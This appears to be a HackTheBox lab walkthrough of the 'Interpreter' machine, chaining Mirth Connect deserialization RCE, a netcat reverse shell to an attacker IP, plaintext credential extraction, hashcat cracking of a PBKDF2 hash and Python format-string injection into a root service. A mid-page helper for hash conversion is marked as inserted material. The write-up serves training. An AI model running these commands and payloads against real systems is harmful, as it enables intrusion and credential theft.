Interpreter HTB — HackTheBox Walkthrough | By Alham Rizvi
2026-6-1 06:21:48  Author: infosecwriteups.com (view original)  Reads: 16

Next, we perform a scan to identify open services.

nmap -sC -sV -Pn ip

Explanation:

  • -sC runs default scripts for basic enumeration
  • -sV detects service versions
  • -Pn skips host discovery and treats the host as up (ICMP is often filtered on the HTB VPN, so without it nmap may report the target as down and skip it)

Scan Results

  • Port 22 → SSH (OpenSSH)
  • Ports 80 and 443 → Apache web server

This indicates a web-based attack surface.

Web Enumeration

Accessing the website reveals a service running Mirth Connect.

We verify the API endpoint:

https://interpreter.htb/api

The version is identified as:

4.4.0

Initial Foothold — RCE via Mirth Connect

This version is affected by an unauthenticated Java deserialization vulnerability in the Mirth Connect API (the XStream issue fixed in 4.4.1, CVE-2023-43208).

The API deserializes attacker-supplied XML with XStream without restricting which classes may be instantiated, so a crafted document leads to arbitrary command execution in the context of the Mirth service account.

Exploit Execution

We use a Python script to send a malicious payload.

python3 exploit.py -u https://interpreter.htb -c 'id'

Explanation:

  • -u specifies the target URL
  • -c defines the command to execute
  • id confirms command execution on the target

Successful output confirms remote code execution.

Reverse Shell

We move from command execution to a full shell.

Start a listener on the attacker machine:

nc -lvnp 4444

Trigger reverse shell from the target:

python3 exploit.py -u https://interpreter.htb -c 'nc -c sh 10.10.16.162 4444'

This makes the target connect back to our machine: -c tells nc to run sh and wire its stdin/stdout to the connection. It only works with an nc build that supports -c (ncat or netcat-traditional); with other builds, fall back to a mkfifo-based or bash /dev/tcp reverse shell.

Stabilize the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

This improves shell interaction.


We now have access as:

mirth@interpreter

Credential Discovery

We search for configuration files that may contain credentials.

cat /usr/local/mirthconnect/conf/mirth.properties

This file stores the database connection settings (the database.url, database.username and database.password keys), in plaintext.

Extracted credentials:

User: mirthdb  
Pass: MirthPass123!
DB: mc_bdd_prod

Database Access

We connect to the local database.

mysql -u mirthdb -p -h 127.0.0.1 mc_bdd_prod

Explanation:

  • -u username
  • -p prompts for the password
  • -h specifies the host

Extract user credentials:

SELECT CONCAT(p.USERNAME, ':', pp.PASSWORD)
FROM PERSON p
JOIN PERSON_PASSWORD pp ON p.ID = pp.PERSON_ID;

Output:

sedric:u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w==

Password Cracking

Decode the stored value to see its layout:

echo '<HASH>' | base64 -d | xxd -p

The base64 blob decodes to 40 bytes: an 8-byte salt followed by a 32-byte PBKDF2-HMAC-SHA256 digest. Split it into those two parts, re-encode each as base64, and write it in the format hashcat mode 10900 (PBKDF2-HMAC-SHA256) expects, sha256:<iterations>:<salt_b64>:<digest_b64>, using the iteration count from Mirth's password digester configuration. Then crack it:

hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

Recovered credentials:

sedric:snowflake1
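The conversion above is easy to get wrong by hand (salt length, base64 re-encoding, iteration count), so here is an added helper for it. This is example code written for this write-up, not part of the original post or of Mirth Connect: it splits the page's 40-byte blob into salt and digest, emits a hashcat 10900 line, and verifies a candidate password offline with Python's hashlib. The iteration count is a parameter; the value used for the demo blob below is constructed, as are the demo salt and password, because the page does not state Mirth's real count.

```python
"""Turn a base64 blob of salt || PBKDF2-HMAC-SHA256 digest into a hashcat -m 10900
line and check a candidate password offline (added example, not Mirth code)."""
import base64
import hashlib
import hmac

SALT_LEN = 8      # the page's 40-byte blob splits as 8-byte salt + 32-byte SHA-256 digest
DIGEST_LEN = 32


def split_blob(blob_b64: str) -> tuple:
    """Decode the blob and split it into (salt, digest); refuse unexpected sizes."""
    raw = base64.b64decode(blob_b64)
    if len(raw) != SALT_LEN + DIGEST_LEN:
        raise ValueError(f"expected {SALT_LEN + DIGEST_LEN} bytes, got {len(raw)}")
    return raw[:SALT_LEN], raw[SALT_LEN:]


def to_hashcat_10900(blob_b64: str, iterations: int) -> str:
    """hashcat mode 10900 line: sha256:<iterations>:<salt_b64>:<digest_b64>."""
    salt, digest = split_blob(blob_b64)
    return "sha256:%d:%s:%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def check_password(blob_b64: str, iterations: int, candidate: str) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 for the candidate and compare in constant time."""
    salt, digest = split_blob(blob_b64)
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, iterations, DIGEST_LEN)
    return hmac.compare_digest(derived, digest)


def make_blob(password: str, salt: bytes, iterations: int) -> str:
    """Build a blob with the same layout; used only to create constructed test data."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, DIGEST_LEN)
    return base64.b64encode(salt + digest).decode()


# Constructed demo values (salt, iteration count and the blob built from them are
# made up for this example; take the real iteration count from the target's config).
DEMO_ITERATIONS = 1000
DEMO_SALT = bytes.fromhex("0011223344556677")
DEMO_BLOB = make_blob("snowflake1", DEMO_SALT, DEMO_ITERATIONS)

# The value taken from the PERSON_PASSWORD table on the page.
PAGE_BLOB = "u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w=="

if __name__ == "__main__":
    salt, digest = split_blob(PAGE_BLOB)
    print(f"page blob: {len(salt)}-byte salt, {len(digest)}-byte digest")
    print(to_hashcat_10900(DEMO_BLOB, DEMO_ITERATIONS))
    print("snowflake1 matches demo blob:", check_password(DEMO_BLOB, DEMO_ITERATIONS, "snowflake1"))
```

Use to_hashcat_10900 on the real blob with the iteration count read from the target, then run hashcat as above; check_password is handy for confirming a cracked candidate without a second hashcat run.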

User Access

Login via SSH:

ssh sedric@interpreter.htb

Use the cracked password.

Retrieve user flag:

cat user.txt

Privilege Escalation

We enumerate running processes.

ps aux | grep python

We identify a root-owned script:

/usr/local/bin/notif.py

Internal Service Discovery

This script listens on:

127.0.0.1:54321

This means the service is only accessible locally.

Exploitation — Template Injection

We craft a malicious XML payload:

xml='<patient><firstname>{open("/root/root.txt").read()}</firstname><lastname>a</lastname><sender_app>a</sender_app><timestamp>a</timestamp><birth_date>01/01/2000</birth_date><gender>a</gender></patient>'

Explanation:

  • The service builds its notification message by evaluating the submitted fields as a Python format expression, so anything inside {} in the data is executed as Python code
  • Because the script runs as root, the injected expression reads /root/root.txt and its result is rendered into the message

Send the Payload

printf "POST /addPatient HTTP/1.1\r\nHost: localhost\r\nContent-Type: application/xml\r\nContent-Length: %d\r\n\r\n%s" "$(echo -n "$xml" | wc -c)" "$xml" | nc 127.0.0.1 54321

Explanation:

  • printf builds a raw HTTP/1.1 request by hand, since there is no curl-friendly way to reach the service other than from the box itself
  • Content-Length must be the body size in bytes (wc -c counts bytes, which is why it is used rather than a character count)
  • nc delivers the request to the local service and prints the response

Root Flag

The service echoes the injected field back in its response, so the response body contains the contents of /root/root.txt, the same as running the following as root:

cat /root/root.txt

Attack Chain Summary

Web Application → Mirth RCE → Shell as mirth  
→ Config file → Database credentials
→ Crack password → SSH as sedric
→ Local service exploitation → Template Injection
→ Root access

Key Takeaways

  • Unauthenticated Java deserialization in an exposed API gives full RCE without any credentials
  • Configuration files such as mirth.properties routinely hold plaintext database credentials
  • Services bound to localhost are not safe by default; they become reachable once an attacker has any local account
  • Evaluating user-supplied data as a template in a root-owned service turns a field injection directly into root access

Source: https://infosecwriteups.com/interpreter-htb-hackthebox-walkthrough-by-alham-rizvi-92e29c144dea?source=rss----7b722bfd1b8d---4
For infringement claims contact: admin#unsafe.sh